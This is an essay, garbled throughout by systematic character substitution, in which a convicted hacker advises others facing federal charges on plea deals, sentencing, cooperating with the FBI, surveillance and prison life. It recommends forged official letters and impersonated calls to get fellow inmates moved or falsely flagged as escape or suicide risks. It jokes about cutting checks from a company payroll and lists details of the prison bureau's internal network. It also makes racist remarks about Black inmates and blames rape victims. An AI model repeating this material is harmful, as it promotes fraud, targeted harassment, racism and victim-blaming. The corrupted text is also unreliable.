so that s.ecial law firms are forming that deal only with sentencing& 1f you get busted( 1 would highly recommend hiring one& 1n some cases it might be wise to a<oid hiring a trial attorney and go straight to one of these :+ost /on<iction S.ecialists&: Sa<e your money( .lead out( do your time& #his may sound a little harsh( but considering the fact that the 0&S& *ttorney's 4ffice has a 95P con<iction rate( it may be sage ad<ice& Howe<er( 1 don't want to gloss o<er the im.ortance of a ready for trial .osturing& 1f you ha<e a strong trial attorney( and ha<e a strong case( it will go a long way towards good .lea bargain negotiations& /& +73* *G53363"#S *"2 *##45"3;S ;our attorney can be your worst foe or your finest ad<ocate& Hinding the .ro.er one can be a difficult task& /osts will <ary and ty.ically the attorney asks you how much cash you can raise and then says( :that amount will be fine:& 1n actuality a sim.le .lea and sentencing should run you around O,5(MMM& #rial fees can easily soar into the E figure category& *nd finally( a .ost con<iction s.ecialist will charge O5MMM to O,5(MMM to handle your sentencing .resentation with final arguments& ;ou may howe<er( find yourself at the mercy of #he +ublic 2efenders 4ffice& 0sually they are worthless( occasionally you'll find one that will fight for you& 3ssentially it's a cra. shoot& *ll 1 can say is if you don't like the one you ha<e( fire them and ho.e you get a..ointed a better one& 1f you can scra.e together O5MMM for a sentencing !.ost con<iction$ s.ecialist to work with your .ublic defender 1 would highly recommend it& #his s.ecialist will make certain the =udge sees the whole .icture and will argue in the most effecti<e manner for a light or reasonable sentence& 2o not rely on your .ublic defender to thoroughly .resent your case& ;our sentencing hearing is going to flash by so fast you'll walk out of the court room di>>y& ;ou and your defense team need to go into that hearing fully .re.ared( ha<ing already filed a sentencing memorandum& #he .lea agreement you sign is going to affect you and your case well after you are sentenced& +lea agreements can be tricky business and if you are not careful or are in a bad defense .osition !the case against you is strong$( your agreement may get the best of you& #here are many issues in a .lea to negotiate o<er& But essentially my ad<ice would be to a<oid signing away your right to a..eal& 4nce you get to a real .rison with real =ailhouse lawyers you will find out how bad you got screwed& #hat issue notwithstanding( you are most likely going to want to a..eal& #his being the case you need to

remember two things: bring all your a..ealable issues u. at sentencing and file a notice of a..eal within ,M days of your sentencing& Snoo>e and loose& 1 should howe<er( mention that you can a..eal some issues e<en though you signed away your rights to a..eal& Hor e'am.le( you can not sign away your right to a..eal an illegal sentence& 1f the =udge orders something that is not .ermissible by statute( you then ha<e a constitutional right to a..eal your sentence& 1 will close this sub.art with a .rison =oke& S: How can you tell when your attorney is lying? *: ;ou can see his li.s mo<ing& 2& /4"S+15*/; Whate<er ha..ened to getting off on a technicality? 1'm sorry to say those days are gone( left only to the mo<ies& #he courts generally dismiss many arguments as :harmless error: or :the go<ernment acted in good faith:& #he most alarming trend( and surely the root of the .rosecutions success( are the liberally worded cons.iracy laws& Suite sim.ly( if two or more .eo.le .lan to do something illegal( then one of them does something in furtherance of the ob=ecti<e !e<en something legal$( then it's a crime& ;es( it's true& 1n *merica it's illegal to sim.ly talk about committing a crime& +aging 6r& 4rwell& Hello? Here's a hy.othetical e'am.le to clarify this& Bill G& and 6arc *& are hackers !can you imagine?$ Bill and 6arc are talking on the .hone and unbeknownst to them the HB1 is recording the call& #hey talk about hacking into *..le's mainframe and erasing the .rototy.e of the new *..le Web Browser& 7ater that day( 6arc does some legitimate research to find out what ty.e of mainframe and o.erating system *..le uses& #he ne't morning( the Heds raid 6arc's house and sei>e e<erything that has wires& Bill and 6arc go to trial and s.end millions to defend themsel<es& #hey are both found guilty of cons.iracy to commit unauthori>ed access to a com.uter system& 3& S3"#3"/1"G *t this .oint it is u. to the .robation de.artment to .re.are a re.ort for the court& 1t is their res.onsibility to calculate the loss and identify any aggra<ating or mitigating circumstances& *..le /om.uter /or.oration estimates that if Bill and 6 arc would ha<e been successful it would ha<e resulted in a loss of O- million& #his is the figure the court will use& Based on

this basic scenario our dynamic duo would recei<e roughly three?year sentences& *s 1 mentioned( sentencing is com.le' and many factors can decrease or increase a sentence( usually the latter& 7et's say that the HB1 also found a file on 6arc's com.uter with 5M(MMM unauthori>ed account numbers and .asswords to #he 6icrosoft "etwork& 3<en if the HB1 does not charge him with this( it could be used to increase his sentence& Generally the go<ernment .laces a O-MM?.er?account attem.ted loss on things of this nature !i&e& credit card numbers and .asswords W access de<ices$& #his makes for a O,M million loss& /ou.led with the O- million from *..le( 6arc is going away for about nine years& Hortunately there is a Hederal +rison not too far from 5edmond( W* so Bill could come <isit him& Some of the other factors to be used in the calculation of a sentence might include the following: .ast criminal record( how big your role in the offense was( mental disabilities( whether or not you were on .robation at the time of the offense( if any wea.ons were used( if any threats were used( if your name is 8e<in 6itnick !heh$( if an elderly .erson was <ictimi>ed( if you took ad<antage of your em.loyment .osition( if you are highly trained and used your s.ecial skill( if you coo.erated with the authorities( if you show remorse( if you went to trial( etc& #hese are =ust some of the many factors that could either increase or decrease a sentence& 1t would be beyond the sco.e of this article to co<er the 0&S&S&G& in com.lete detail& 1 do feel that 1 ha<e ski..ed o<er some significant issues& "e<erthele ss( if you remember my two main .oints in addition to how the cons.iracy law works( you'll be a long way ahead in .rotecting yourself& H& 0S3 4H * S+3/1*7 S8177 #he only s.ecific :sentencing enhancement: 1 would like to co<er would be one that 1 am res.onsible for setting a .recedent with& 1n 0&S& < +etersen( 9D H&%d& 5M-( 9th /ir&( the 0nited States /ourt of *..eals held that some com.uter hackers may @ualify for the s.ecial skill enhancement& What this generally means is a E to -G month increase in a sentence& 1n my case it added eight months to my %%?month sentence bringing it to G, months& 3ssentially the court stated that since 1 used my :so.histicated: hacking skills towards a legitimate end as a com.uter security consultant( then the enhancement a..lies& 1t's ironic that if 1 were to ha<e remained strictly a criminal hacker then 1 would ha<e ser<ed less time&

#he moral of the story is that the go<ernment will find ways to gi<e you as much time as they want to& #he 0&S&S&G& came into effect in ,9DK in an attem.t to eliminate dis.arity in sentencing& 2efendants with similar crimes and similar backgrounds would often recei<e different sentences& 0nfortunately( this .ractice still continues& #he 0&S&S&G& are indeed a failure& G& G3##1"G B*17 1n the .ast( the Heds might sim.ly ha<e e'ecuted their raid and then left without arresting you& +resently this method will be the e'ce.tion rather than the rule and it is more likely that you will be taken into custody at the time of the raid& /hances are also good that you will not be released on bail& #his is .art of the go<ernment's .lan to break you down and win their case& 1f they can find any reason to deny you bail they will& 1n order to @ualify for bail( you must meet the following criteri a: ? ;ou must be a resident of the =urisdiction in which you were arrested& ? ;ou must be gainfully em.loyed or ha<e family ties to the area& ? ;ou cannot ha<e a history of failure to a..ear or esca.e& ? ;ou cannot be considered a danger or threat to the community& 1n addition( your bail can be denied for the following reasons: ? Someone came forward and stated to the court that you said you would flee if released& ? ;our sentence will be long if con<icted& ? ;ou ha<e a .rior criminal history& ? ;ou ha<e .ending charges in another =urisdiction& What results from all this :bail reform: is that only about -MP of .ersons arrested make bail& 4n to. of that it takes ,?% weeks to .rocess your bail .a.ers when .ro.erty is in<ol<ed in securing your bond&

"ow you're in =ail( more s.ecifically you are either in an administrati<e holding facility or a county =ail that has a contract with the Heds to hold their .risoners& +ray that you are in a large enough city to =ustify its own Hederal 2etention /enter& /ounty =ails are ty.ically the last .lace you would want to be& H& S#*#3 CS& H3235*7 /H*5G3S 1n some cases you will be facing state charges with the .ossibility of the Heds :.icking them u.&: ;ou may e<en be able to nudge the Heds into indicting you& #his is a tough decision& With the state you will do considerably less time( but will face a tougher crowd and conditions in .rison& Granted Hederal +risons can be <iolent too( but generally as a non?<iolent white collar criminal you will e<entually be .laced into an en<ironment with other low security inmates& 6ore on this later& 0ntil you are sentenced( you will remain as a :.retrial inmate: in general .o.ulation with other inmates& Some of the other inmates will be .redatorial but the Heds do not tolerate much nonsense& 1f someone acts u.( they'll get thrown in the hole& 1f they continue to .ose a threat to the inmate .o.ulation( they will be left in segregation !the hole$& 4ccasionally inmates that are at risk or that ha<e been threatened will be .laced in segregation& #his isn't really to .rotect the inmate& 1t is to .r otect the .rison from a lawsuit should the inmate get in=ured& 1& /44+35*#1"G "aturally when you are first arrested the suits will want to talk to you& Hirst at your residence and( if you a..ear to be talkati<e( they will take you back to their offices for an e'tended chat and a cu. of coffee& 6y ad<ice at this .oint is tried and true and we'<e all heard it before: remain silent and ask to s.eak with an attorney& 5egardless of what the situation is( or how you .lan to .roceed( there is nothing you can say that will hel. you& "othing& 3<en if you know that you are going to coo.erate( this is not the time& #his is ob<iously a contro<ersial sub=ect( but the fact of the matter is roughly DMP of all defendants e<entually confess and im.licate others& #his trend stems from the e'tremely long sentences the Heds are handing out these days& "ot many .eo.le want to do ,M to -M years to sa<e their buddies' hides when they could be doing % to 5& #his is a decision each indi<idual needs to make& 6y only ad<ice would be to sa<e your close friends and family& *nyone else

is fair game& 1n the .rison system the blacks ha<e a saying :Getting down first&: 1t's no secret that the first defendant in a cons.iracy is usually going to get the best deal& 1'<e e<en seen situations where the big fish turned in all his little fish and ecei<ed GMP off his sentence& 1ncidently( being debriefed or interrogated by the Heds can be an ordeal in itself& 1 would ?highly? reccommend reading u. on interrogation techni@ues ahead of time& 4nce you know their methods it will be all @uite trans.arent to you and the debriefing goes much more smoothly& When you make a deal with the go<ernment you're making a deal with the de<il himself& 1f you make any mistakes they will renege on the deal and you'll get nothing& 4n some occasions the go<ernment will trick you into thinking they want you to coo.erate when they are not really interested in anything you ha<e to say& #hey =ust want you to .lead guilty& When you sign the coo.eration agreement there are no set .romises as to how much of a sentence reduction you will recei<e& #hat is to be decided after your testimony( etc& and at the time of sentencing& 1t's entirely u. to the =udge& Howe<er( the .rosecution makes the recommendation and the =udge generally goes along with it& 1n fact( if the .rosecution does not motion the court for your :downward de.arture: the courts' hands are tied and you get no break& *s you can see( coo.erating is a tricky business& 6ost .eo.le( .articularly those who ha<e ne<er s.ent a day in =ail( will tell you not to coo.erate& :2on't snitch&: #his is a noble stance to take& Howe<er( in some situations it is =ust .lain stu.id& Sa<ing someone's ass who would easily do the same to you is a tough call& 1t's something that needs careful consideration& 7ike 1 said( sa<e your friends then do what you ha<e to do to get out of .rison and on with your life& 1'm ha..y to say that 1 was able to a<oid in<ol<ing my good friends and a former em.loyer in the massi<e in<estigation that surrounded my case& 1t wasn't easy& 1 had to walk a fine line& 6any of you .robably know that 1 !*gent Steal$ went to work for the HB1 after 1 was arrested& 1 was res.onsible for teaching se<eral agents about hacking and the culture& What many of you don't know is that 1 had close HB1 ties .rior to my arrest& 1 was in<ol<ed in hacking for o<er ,5 years and had worked as a com. uter security consultant& #hat is why 1 was gi<en that o..ortunity& 1t is unlikely howe<er( that we will see many more of these ty.es of arrangements in the future& 4ur relationshi. ran afoul( mostly due to their .assi<e negligence and lack of e'.erience in dealing with hackers& #he go<ernment in general now has their own

resources( e'.erience( and underco<er agents within the community& #hey no longer need hackers to show them the ro.es or the latest security hole& "e<ertheless( if you are in the .osition to tell the Heds something they don't know and hel. them build a case against someone( you may @ualify for a sentence reduction& #he ty.ical range is -MP to KMP& 0sually it's around %5P to 5MP& Sometimes you may find yourself at the end of the .rosecutorial food chain and the go<ernment will not let you coo.erate& 8e<in 6itnick would be a good e'am.le of this& 3<en if he wanted to roll o<er( 1 doubt it would get him much& He's =ust too big of a fish( too much media& 6y final ad<ice in this matter is get the deal in writing before you start coo.erating& #he Heds also like it when you :come clean: and acce.t res.onsibility& #here is a .ro<ision in the Sentencing Guidelines( %3,&,( that knocks a little bit of time off if you confess to your crime( .lead guilty and show remorse& 1f you go to trial( ty.ically you will not @ualify for this :acce.tance of res.onsibility: and your sentence will be longer& R& S#177 #H1"81"G *B40# #51*7 6any hackers may remember the /raig "eidorf case o<er the famous 9,, System 4.eration documents& /raig won his case when it was disco<ered that the manual in @uestion( that he had .ublished in +hrack maga>ine( was not .ro.rietary as claimed but a<ailable .ublicly from *#N#& 1t was an egg in the face day for the Secret Ser<ice& 2on't be misled by this& #he go<ernment learned a lot from this fiasco and e<en with the laudable su..ort from the 3HH( /raig narrowly thwarted off a con<iction& 5egardless( it was a trying e'.erience !no .un intended$ for him and his attorneys& #h e .oint 1'm trying to make is that it's tough to beat the Heds& #hey .lay dirty and will do =ust about anything( including lie( to win their case& 1f you want to really win you need to know how they build a case in the first .lace& 8& S3*5/H *"2 S31Q053 #here is a document entitled :Hederal Guidelines Hor Searching *nd Sei>ing /om.uters&: 1t first came to my attention when it was .ublished in the ,-?-,? 9G edition of the /riminal 7aw 5e.orter by the Bureau of "ational *ffairs !/ite as 5E /57 -M-% $ & 1t's an intriguing collection of ti.s( cases( mistakes and( in general( how to bust com.uter hackers& 1t's recommended reading&

Search and sei>ure is an e<er e<ol<ing =uris.rudence& What's not .ermissible today may( through some con<oluted Su.reme /ourt logic( be .ermissible and legal tomorrow& *gain( a com.lete treatment of this sub=ect is beyond the sco.e of this .a.er& But suffice it to say if a Hederal agent wants to walk right into your bedroom and sei>e all of your com.uter e@ui.ment without a warrant he could do it by sim.ly saying he had .robable cause !+/$& +/ is anything that gi<es him an inkling to belie<e you we re committing a crime& +olice ha<e been known to find +/ to search a car when the trunk sat too low to the ground or the high beams were always on& 7& S05C3177*"/3 *"2 W153#*+S Hortunately the Heds still ha<e to show a little restraint when wielding their wireta.s& 1t re@uires a court order and they ha<e to show that there is no other way to obtain the information they seek( a last resort if you will& Wireta.s are also e'.ensi<e to o.erate& #hey ha<e to lease lines from the .hone com.any( .ay agents to monitor it -G hours a day and then transcribe it& 1f we are talking about a data ta.( there are additional costs& 3'.ensi<e interce.tionItranslation e@ui.ment must be in .lace to negotiate the <arious modem s.eeds& #hen the data has to be stored( deci.hered( decom.ressed( formatted( .rotocoled( etc& 1t's a daunting task and usually reser<ed for only the highest .rofile cases& 1f the Heds can sei>e the data from any other so urce( like the ser<ice .ro<ider or <ictim( they will take that route& 1 don't know what they hate worse though( asking for outside hel. or wasting <aluable internal resources& #he sim.lest method is to enlist the hel. of an informant who will testify :1 saw him do it (: then obtain a search warrant to sei>e the e<idence on your com.uter& Ba da boom( ba da busted& 4ther de<ices include a .en register which is a de<ice that logs e<ery digit you dial on your .hone and the length of the calls( both incoming and outgoing& #he .hone com.anies kee. racks of them at their security de.artments& #hey can .lace one on your line within a day if they feel you are defrauding them& #hey don't need a court order( but the Heds do& * tra.( or tra. and trace( is ty.ically any method the .hone com.any uses to log e<ery number that calls a .articular number& #his can be done on the switching system le<el or <ia a billing database search& #he Heds need a court order for this information too& Howe<er( 1'<e heard stories of coo.erati<e

telco security in<estigations .assing the information along to an agent& "aturally that would be a :harmless error while acting in good faith&: !legal humor$ 1'd lo<e to tell you more about HB1 wireta.s but this is as far as 1 can go without .issing them off& 3<erything 1'<e told you thus far is .ublic knowledge& So 1 think 1'll sto. here& 1f you really want to know more( catch 8e<in +oulsen !2ark 2ante $ at a cocktail .arty( buy him a /oke and he'll gi<e you an earful& !hacker humor$ 1n closing this sub.art 1 will say that most electronic sur<eillance is backed u. with at least .art?time .hysical sur<eillance& #he Heds are often good at following .eo.le around& #hey like late model mid?si>ed *merican cars( <ery stock( with no decals or bum.er stickers& 1f you really want to know if you're under sur<eillance( buy an 4.to?electronics Scout or U.lorer fre@uency counter& Hide it on your .erson( stick an ear .lug in your ear !for the U.lorer$ and take it e<erywhere you go& 1f you he ar .eo.le talking about you( or you continue to hear intermittent static !encry.ted s.eech$( you .robably ha<e a .roblem& 6& ;405 +53S3"#3"/3 1"C3S#1G*#14" 53+45#( +S1 45 +S5 *fter you .lead guilty you will be dragged from the @uiet and comfort of your .rison cell to meet with a .robation officer& #his has absolutely nothing to do with getting .robation& Suite the contrary& #he +&4& is em.owered by the court to .re.are a com.lete and( in theory( unbiased .rofile of the defendant& 3<erything from education( criminal history( .sychological beha<ior( offense characteristics .lus more will be included in this <oluminous and .ainfully detailed re.ort about your life& 3<ery little dirty scra. of information that makes you look like a socio.athic( demon worshi.ing( loathsome criminal will be included in this re.ort& #hey'll .ut a few negati<e things in there as well& 6y ad<ice is sim.le& Be careful what you tell them& Ha<e your attorney .resent and think about how what you say can be used against you& Here's an e'am.le: +&4&: #ell me about your education and what you like to do in your s.are time&

6r& Steal: 1 am .re.aring to enroll in my final year of college& 1n my s.are time 1 work for charity hel.ing or.han children& #he +S5 then reads :6r& Steal has ne<er com.leted his education and hangs around with little children in his s.are time&: Get the .icture? R& +54/3321"G +54 S3 +ro Se or +ro +er is when a defendant re.resents himself& * famous lawyer once said :a man that re.resents himself has a fool for a client&: #ruer words were ne<er s.oken& Howe<er( 1 can't stress how im.ortant it is to fully understand the criminal =ustice system& 3<en if you ha<e a great attorney it's good to be able to kee. an eye on him or e<en hel. out& *n educated client's hel. can be of enormous benefit to an attorney& #hey may think you're a .ain in the ass but it's your life& #ake a hold of it& 5egardless( re.resenting yourself is generally a mistake& Howe<er( after your a..eal( when your court a..ointed attorney runs out on you( or you ha<e run out of funds( you will be forced to handle matters yourself& *t this .oint there are legal a<enues( although @uite bleak( for .ost? con<iction relief& But 1 digress& #he best .lace to start in understanding the legal system lies in three ine'.ensi<e books& Hirst the Hederal Sentencing Guidelines !O,G&MM$ and Hederal /riminal /odes and 5ules !O-M&MM$ are a<ailable from West +ublishing at DMM?%-D?9 %5-& 1 consider .ossession of these books to be mandatory for any .retrial inmate& Second would be the Georgetown 7aw Rournal( a<ailable from Georgetown 0ni<ersity Bookstore in Washington( 2/& #he book sells for around OGM&MM but if you write them a letter and tell them you're a +ro Se litigant they will send it for free& *nd last but not least the definiti<e +ro Se authority( :#he +risoners Self Hel. 7itigation 6anual: O-9&95 1SB" M?%K9?-MD%,?D& 4r try htt.:IIwww&oceanalaw&comIbooksIn,GD&htm 4& 3C123"#1*5; H3*51"G 1f you disagree with some of the information .resented in the .resentence re.ort !+S5$ you may be entitled to a s.ecial hearing& #his can be instrumental in lowering your sentence or correcting your +S5& 4ne

im.ortant thing to know is that your +S5 will follow you the whole time you are incarcerated& #he Bureau of +risons uses the +S5 to decide how to handle you& #his can affect your security le<el( your halfway house( your eligibility for the drug .rogram !which gi<es you a year off your sentence$ (and your medical care& So make sure your +S5 is accurate before you get sentenced +& G3##1"G ;405 +54+35#; B*/8 1n most cases it will be necessary to formally ask the court to ha<e your .ro.erty returned& #hey are not going to =ust call you u. and say :2o you want this S.arc Station back or what?: "o( they would =ust as soon kee. it and not asking for it is as good as telling them they can ha<e it& ;ou will need to file a G,!e$ :6otion Hor 5eturn 4f +ro.erty&: #he courts' authority to kee. your stuff is not always clear and will ha<e to be taken on a case?by?case basis& #hey may not care and the =udge will sim.ly order that it be returned& 1f you don't know how to write a motion( =ust send a formal letter to the =udge asking for it back& #ell him you need it for your =ob& #his should suffice( but there may be a filing fee& S& 40#S#*"21"G W*55*"#S 1f you ha<e an outstanding warrant or charges .ending in another =urisdiction you would be wise to deal with them as soon as .ossible ?after? you are sentenced& 1f you follow the correct .rocedure chances are good the warrants will be dro..ed !@uashed$& 1n the worst case scenario( you will be trans.orted to the a..ro.riate =urisdiction( .lead guilty and ha<e your :time run concurrent&: #y.ically in non?<iolent crimes you can ser<e se<eral sentences all at the same time& 6any Hederal inmates ha<e their state time run with their Hederal time& 1n a nutshell: concurrent is good( consecuti<e bad& #his .rocedure is referred to as the 1nterstate *greement 4n 2etainers *ct !1*2*$& ;ou may also file a :demand for s.eedy trial:( with the a..ro.riate court& #his starts the meter running& 1f they don't e'tradite you within a certain .eriod of time ( the charges will ha<e to be dro..ed& #he :1nmates' Self?Hel. 7itigation 6anual: that 1 mentioned earlier co<ers this to.ic @uite well& 5& 3"/5;+#14"

#here are .robably a few of you out there saying( :1 tri.le 23S encry.t my hard dri<e and ,-D character 5S* .ublic key it for safety&: Well( that's =ust great( but&&& the Heds can ha<e a grand =ury sub.oena your .asswords and if you don't gi<e them u. you may be charged with obstruction of =ustice& 4f course who's to say otherwise if you forgot your .assword in all the e'citement of getting arrested& 1 think 1 heard this once or twice before in a Senate Sub?committee hearing& :Senator( 1 ha<e no recollection of the aforementioned e<ents at this time&: But seriously( strong encry.tion is great& Howe<er( it would be foolish to rely on it& 1f the Heds ha<e your com.uter and access to your encry.tion software itself( it is likely they could break it gi <en the moti<ation& 1f you understand the true art of code breaking you should understand this& +eo.le often o<erlook the fact that your .assword( the one you use to access your encry.tion .rogram( is ty.ically less than D characters long& By attacking the access to your encry.tion .rogram with a keyboard emulation se@uencer your tri.le 23SI,-D bit 5S* cry.to is worthless& Rust remember( encry.tion may not .rotect you& S& 73G*7 S066*5; Before 1 mo<e on to the 7ife in +rison sub.art( let me tell you what this all means& ;ou're going to get busted( lose e<erything you own( not get out on bail( snitch on your enemies( get e<en more time than you e'.ected and ha<e to .ut u. with a bu nch of idiots in .rison& Sound fun? 8ee. hacking& *nd( if .ossible( work on those sensiti<e &go< sites& #hat way they can hang an es.ionage ra. on you& #hat will carry about ,- to ,D years for a first time offender& 1 know this may all sound a bit bleak( but the stakes for hackers ha<e gone u. and you need to know what they are& 7et's take a look at some recent sentences: *gent Steal !me$ G, months 8e<in +oulsen 5, months 6inor #hreat KM months 8e<in 6itnick estimated K?9 years *s you can see( the Heds are gi<ing out some time now& 1f you are young( a first?time offender( unso.histicated !like 642$( and were =ust looking around

in some little com.any's database( you might get .robation& But chances are that if that is all you were doing( you would ha<e been .assed o<er for .rosecution& *s a rule( the Heds won't take the case unless O,M(MMM in damages are in<ol<ed& #he .roblem is who is to say what the loss is? #he com.any can say whate<er figure it likes and it would be t ough to .ro<e otherwise& #hey may decide to( for insurance .ur.oses( blame some huge downtime e'.ense on you& 1 can hear it now( :When we detected the intruder( we .rom.tly took our system off?line& 1t took us two weeks to bring it u. again for a loss in wasted man.ower of O- million&: 1n some cases you might be better off =ust using the com.any's .ayroll system to cut you a cou.le of O,M(MMM checks& #hat way the go<ernment has a firm loss figure& #his would result in a much shorter sentence& 1'm not ad<ocating blatant criminal actions& 1 =ust think the sentencing guidelines definitely need some work& +*5# 11 ? H3235*7 +51S4" *& S#*#3 <& H3235*7 1n most cases 1 would say that doing time in a Hederal +rison is better than doing time in the state institutions& Some state .risons are such <iolent and .athetic .laces that it's worth doing a little more time in the Hederal system& #his is going to be changing howe<er& #he .ublic seems to think that .risons are too comfortable and as a result /ongress has .assed a few bills to toughen things u.& Hederal .risons are generally going to be somewhat less crowded( cleaner( and more laid back& #he .rison 1 was at looked a lot like a college cam.us with .lenty of grass and trees( rolling hills( and stucco buildings& 1 s.ent most of my time in the library hanging out with 6inor #hreat& We would argue o<er who was more elite& :6y sentence was longer(: he would argue& :1 was in more books and news.a.ers(: 1 would rebut& !humor$ 3'ce.tions to the Hed is better rule would be states that .ermit tele<isions and word .rocessors in your cell& *s 1 sit here =ust .rior to release scribbling this article with .en and .a.er 1 yearn for e<en a Smith /orona with one line dis.lay& #he states ha<e <arying .ri<ileges& ;ou could wind u. some.lace where e<erything gets stolen from you& #here are also states that are abolishing .arole( thus taking away the ability to get out early with good beha<ior& #hat is what the Heds did& B& S3/051#; 73C37S

#he Bureau of +risons !B4+$ has si' security le<els& +risons are assigned a security le<el and only .risoners with the a..ro.riate ratings are housed there& 4ften the B4+ will ha<e two or three facilities at one location& Still( they are essentially se.arate .risons( di<ided by fences& #he lowest le<el facility is called a minimum( a cam.( or H+/& Generally s.eaking( you will find first time( non?<iolent offenders with less than ,M year sentences there& /am.s ha<e no fences& ;our work assignment at a cam. is usually off the .rison grounds at a nearby military base& 4ther times cam.s o.erate as su..ort for other nearby .risons& #he ne't le<el u. is a low Hederal /orrectional 1nstitution !H/1$& #hese are where you find a lot of .eo.le who should be in a cam. but for some technical reason didn't @ualify& #here is a double fence with ra>or wire surrounding it& *gain you will find mostly non?<iolent ty.es here& ;ou would really ha<e to .iss someone off before they would take a swing at you& 6o<ing u. again we get to medium and high H/1's which are often combined& 6ore ra>or wire( more guards( restricted mo<ement and a rougher crowd& 1t's also common to find .eo.le with -M or %MX year sentences& Highting is much more common& 8ee. to yourself( howe<er( and .eo.le generally lea<e you alone& 8illings are not too terribly common& With a .rison .o.ulation of ,5MM?-MMM( about one or two a year lea<e on a stretcher and don't come back& #he 0nited States +enatentury !0&S&+&$ is where you find the murderers( ra.ists( s.ies and the roughest gang bangers& :7ea<enworth: and :*tlanta: are the most infamous of these =oints& #raditionally surrounded by a GM foot brick wall( they take on an ominous a..earance& #he murder rate .er .rison a<erages about %M .er year with well o<er -5M stabbings& #he highest security le<el in the system is 6a'( sometimes referred to as :Su.erma'&: 6a' custody inmates are locked down all the time& ;our mail is shown to you o<er a #C screen in your cell& #he shower is on wheels and it comes to your door& ;ou rarely see other humans and if you do lea<e your cell you will be handcuffed and ha<e at least a three guard escort& 6r& Gotti( the 6afia boss( remains in Su.erma'& So does *ldridge *mes( the s.y& /& G3##1"G 23S1G"*#32 4nce you are sentenced( the B4+ has to figure out what they want to do with you& #here is a manual called the :/ustody and /lassification 6anual: that

they are su..osed to follow& 1t is .ublicly a<ailable through the Hreedom of 1nformation *ct and it is also in most .rison law libraries& 0nfortunately( it can be inter.reted a number of different ways& *s a result( most .rison officials res.onsible for classifying you do .retty much as they .lease& ;our first classification is done by the 5egion 2esignator at B4+ 5egional Head@uarters& *s a com.uter hacker you will most likely be .laced in a cam. or a low H/1& #his is assuming you weren't .ulling bank =obs on the side& ?1H? you do wind u. in an H/1( you should make it to a cam. after si' months& #his is assuming you beha<e yourself& *nother thing the 5egion 2esignator will do is to .lace a :/om.uter "o: on your file& #his means you will not be allowed to o.erate a com.uter at your .rison work assignment& 1n my case 1 wasn't allowed to be within ,M feet of one& 1t was e'.lained to me that they didn't e<en want me to know the ty.es of software they were running& 1ncidentally( the B4+ uses +/ISer<er based 7*"s with "etWare G&, running on Hiber ,Mbase# 3thernet connections to /abletron switches and hubs& +/ based gateways reside a t e<ery .rison& #he connection to the 1B6 mainframe !Sentry$ is done through leased lines <ia S.rintnet's Hrame 5elay ser<ice with %-KM emulation softwareIhardware resident on the local ser<ers& Sentry resides in Washington( 2&/& with S"* ty.e network con centrators at the regional offices& A?$ *nd 1 .icked all of this u. without e<en trying to& "eedless to say( B4+ com.uter security is <ery la'& 6any of their .ublicly a<ailable :+rogram Statements: contain s.ecific information on how to use Sentry and wha t it's designed to do& #hey ha<e other networks as well( but this is not a tutorial on how to hack the B4+& 1'll sa<e that for if they e<er really .iss me off& !humor$ "ot sur.risingly( the B4+ is <ery .aranoid about com.uter hackers& 1 went out of my way not to be interested in their systems or to recei<e com.uter security related mail& "e<ertheless( they tried restricting my mail on numerous occasions& *fter 1 filed numerous grie<ances and had a meeting with the warden( they decided 1 was .robably going to beha<e myself& 6y -M or so maga>ine subscri.tions were .ermitted to come in( after a s.ecial screening& 2es.ite all of that 1 still had occasional .roblems( usually when 1 recei<ed something esoteric in nature& 1t's my understanding( howe<er( that many hackers at other .risons ha<e not been as fortunate as 1 was& 2& 1G"45*"# 1"6*#3S

;ou will meet some of the stu.idest .eo.le on the .lanet in .rison& 1 su..ose that is why they are there( too dumb to do anything e'ce.t crime& *nd for some strange reason these uneducated low class common thie<es think they deser<e your res.ect& 1n fact they will often demand it& #hese are the same .eo.le that condemn e<eryone who coo.erated( while at the same time feel it is fine to break into your house or rob a store at gun.oint& #hese are the ty.es of inmates you will be incarcerated with( an d occasionally these inmates will try to get o<er on you& #hey will do this for no reason other than the fact you are an easy mark& #here are a few tricks hackers can do to .rotect themsel<es in .rison& #he key to your success is acting before the .roblem escalates& 1t is also im.ortant to ha<e someone outside !.referably another hacker$ that can do some social engineering for you& #he ob=ecti<e is sim.ly to ha<e your .roblem inmate mo<ed to another institution& 1 don't want to gi<e away my methods but if staff belie<es that an inmate is going to cause trouble( or if they belie<e his life is in danger( they will mo<e him or loc k him away in segregation& Social engineered letters !official looking$ or .hone calls from the right source to the right de.artment will often e<oke brisk action& 1t's also @uite sim.le to make an inmates life @uite miserable& 1f the B4+ has reason to be lie<e that an inmate is an esca.e risk( a suicide threat( or had .ending charges( they will handle them much differently& #acking these labels on an inmate would be a real nasty trick& 1 ha<e a saying: :Hackers usually ha<e the last word in arguments&: 1n deed& /hances are you won't ha<e many troubles in .rison& #his es.ecially a..lies if you go to a cam.( mind your own business( and watch your mouth& "e<ertheless( 1'<e co<ered all of this in the e<ent you find yourself caught u. in the ignorant beha<ior of inmates whose li<es re<ol<e around .rison& *nd one last .iece of ad<ice( don't make threats( truly stu.id .eo.le are too stu.id to fear anything( .articularly an intelligent man& Rust do it& 3& +4+07*#14" #he distribution of blacks( whites and His.anics <aries from institution to institution& 4<erall it works out to roughly %MP white( %MP His.anic and %MP black& #he remaining ,MP are <arious other races& Some =oints ha<e a high .ercent of blacks and <ice <ersa& 1'm not necessarily a .re=udiced .erson( but .risons where blacks are in ma=ority are a nightmare& *cting loud( disres.ectful( and trying to run the .lace is .ar for the course&

1n terms of crimes( EMP of the Hederal inmate .o.ulation are incarcerated for drug related crimes& #he ne't most common would be bank robbery !usually for @uick drug money$( then <arious white collar crimes& #he Hederal .rison .o.ulation has changed o<er the years& 1t used to be a .lace for the criminal elite& #he tough drug laws ha<e changed all of that& Rust to @uell the rumors( 1'm going to co<er the to.ic of .rison ra.e& Suite sim.ly( in medium and low security le<el Hederal .risons it is unheard of& 1n the highs it rarely ha..ens& When it does ha..en( one could argue that the <ictim was asking for it& 1 heard an inmate say once( :;ou can't make no inmate suck cock that don't wanta&: 1ndeed& 1n my G, months of incarceration( 1 ne<er felt in any danger& 1 would occasionally ha<e inmates that would subtly ask me @uestions to see where my .references lie( but once 1 made it clear that 1 didn't swing that way 1 would be left alone& Hell( 1 got hit on more often when 1 was hanging out in Hollywood 4n the other hand( state .risons can be a hostile en<ironment for ra.e and fighting in general& 6any of us heard how Bernie S& got beat u. o<er use of the .hone& 1ndeed( 1 had to get busy a cou.le of times& 6ost .rison arguments occur o<er three sim.le things: the .hone( the #C and moneyIdrugs& 1f you want to stay out of trouble in a state .rison( or Hederal for that matter( don't use the .hone too long( don't change the channel and don't get in<ol<ed in gambling or 